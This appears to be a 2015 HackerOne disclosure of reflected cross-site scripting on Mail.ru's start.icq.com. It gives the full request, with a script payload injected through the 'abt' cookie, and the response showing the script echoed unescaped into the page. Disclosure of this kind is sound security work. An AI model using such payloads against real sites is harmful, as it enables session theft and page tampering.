Mail.ru: [start.icq.com] Reflected XSS via Cookies

2015-08-20T03:29:00
ID H1:83576
Type hackerone
Reporter bigbear_
Modified 2015-10-21T11:27:49

Description

Request:

GET / HTTP/1.1 Cookie: geo=380; icqsrch_lang=ua; abt=1"><script>alert(document.domain)</script><a href="; icq_pref=medium%3A_blank Referer: http://start.icq.com/ Host: start.icq.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 Accept: /

Response:

<div class="d3-1-3" id="icq_ads" onmouseover="showIcqAd('block')" onmouseout="showIcqAd('none')"> <a href="//www.icq.com/download/mobile/ua?sp=1"><script>alert(document.domain)</script><a href="" target="_blank" onclick="call_ga_event('icq_ads', 'ver_1')"> <img src="//search.icq.com/search/img/new/mobile.jpg" border="0"/> </a> <div class="d3-1-3-1"> <div class="d3-1-3-1-1"> <a href="//www.icq.com/download/mobile/ua?sp=1"><script>alert(document.domain)</script><a href="" target="_blank" onclick="call_ga_event('icq_ads', 'ver_1')" style="text-decoration:none; color:#000000;"> ICQ Mobile